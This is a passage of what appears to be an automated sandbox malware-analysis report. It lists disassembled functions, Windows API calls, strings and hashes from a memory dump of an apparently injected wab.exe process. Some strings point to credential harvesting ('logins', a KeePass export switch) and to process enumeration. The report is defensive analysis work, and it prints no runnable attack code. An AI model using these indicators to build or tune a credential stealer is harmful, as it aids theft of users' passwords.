                                                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                            • API String ID: 2000436516-3842416460
                                                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1043902810-0
                                                                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@_snwprintfwcscpy
                                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                            • API String ID: 2899246560-1542517562
                                                                                            • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                            • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040DBCD
                                                                                            • memset.MSVCRT ref: 0040DBE9
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                            • wcscpy.MSVCRT ref: 0040DC2D
                                                                                            • wcscpy.MSVCRT ref: 0040DC3C
                                                                                            • wcscpy.MSVCRT ref: 0040DC4C
                                                                                            • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                            • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                            • wcscpy.MSVCRT ref: 0040DCC3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                            • API String ID: 3330709923-517860148
                                                                                            • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                            • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                            • memset.MSVCRT ref: 0040806A
                                                                                            • memset.MSVCRT ref: 0040807F
                                                                                            • _wtoi.MSVCRT ref: 004081AF
                                                                                            • _wcsicmp.MSVCRT ref: 004081C3
                                                                                            • memset.MSVCRT ref: 004081E4
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                            • String ID: logins$null
                                                                                            • API String ID: 3492182834-2163367763
                                                                                            • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                            • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • memset.MSVCRT ref: 004085CF
                                                                                            • memset.MSVCRT ref: 004085F1
                                                                                            • memset.MSVCRT ref: 00408606
                                                                                            • strcmp.MSVCRT ref: 00408645
                                                                                            • _mbscpy.MSVCRT ref: 004086DB
                                                                                            • _mbscpy.MSVCRT ref: 004086FA
                                                                                            • memset.MSVCRT ref: 0040870E
                                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                            • String ID: ---
                                                                                            • API String ID: 3437578500-2854292027
                                                                                            • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                            • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041087D
                                                                                            • memset.MSVCRT ref: 00410892
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1010922700-0
                                                                                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                            • malloc.MSVCRT ref: 004186B7
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                            • malloc.MSVCRT ref: 004186FE
                                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$FullNamePath$malloc$Version
                                                                                            • String ID: |A
                                                                                            • API String ID: 4233704886-1717621600
                                                                                            • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                            • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                            • API String ID: 2081463915-1959339147
                                                                                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2012295524-70141382
                                                                                            • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                            • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                            • API String ID: 667068680-3953557276
                                                                                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                            • memcpy.MSVCRT ref: 0041234D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1700100422-0
                                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                            • String ID:
                                                                                            • API String ID: 552707033-0
                                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                            • memcpy.MSVCRT ref: 0040C11B
                                                                                            • strchr.MSVCRT ref: 0040C140
                                                                                            • strchr.MSVCRT ref: 0040C151
                                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                                            • memset.MSVCRT ref: 0040C17A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                            • String ID: 4$h
                                                                                            • API String ID: 4066021378-1856150674
                                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
